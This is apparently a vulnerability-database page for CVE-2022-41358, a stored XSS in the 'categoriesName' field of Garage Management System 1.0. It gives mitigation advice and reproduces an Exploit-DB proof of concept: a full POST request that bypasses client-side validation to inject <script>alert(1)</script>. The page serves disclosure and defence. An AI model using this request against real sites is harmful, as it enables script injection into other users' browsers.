Garage Management System 1.0 (categoriesName) - Stored XSS

vendor:

Garage Management System

by:

Sam Wallace, SC

6.1

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: Garage Management System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: CVE-2022-41358

CPE: a:garagemanagementsystem:garage:1.0

Metasploit:

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=79125

Platforms Tested: Debian

2022

Garage Management System 1.0 (categoriesName) – Stored XSS

Garage Management System 1.0 is vulnerable to stored XSS due to inadequate client-side validation. An attacker can manipulate a request using tools like Burp Suite to evade validation, leading to the injection of malicious scripts into the 'categoriesName' parameter. This can result in the execution of arbitrary scripts in the context of the user's browser.

Mitigation:

To mitigate this vulnerability, implement server-side validation for all user inputs to prevent the execution of malicious scripts. Additionally, encode user-supplied data before rendering it in the HTML context to prevent script injection.

Source

Exploit-DB raw data:

# Exploit Title: Garage Management System 1.0 (categoriesName) - Stored XSS
# Date: 18-09-2022
# Exploit Author: Sam Wallace, SC
# Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2022-41358

Summary:
Garage Management System utilizes client side validation to prevent XSS.
Using burp, a request can be modified and replayed to the server bypassing this validation which creates an avenue for XSS.
Parameter: categoriesName
URI: /garage/php_action/createCategories.php
POC:
POST /garage/php_action/createCategories.php HTTP/1.1
Host: 10.24.0.69
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.24.0.69
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.24.0.69/garage/add-category.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
Connection: close
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesName"
<script>alert(1)</script>
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesStatus"
1
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="create"
------WebKitFormBoundaryqKDsN4gmatTEEkhS--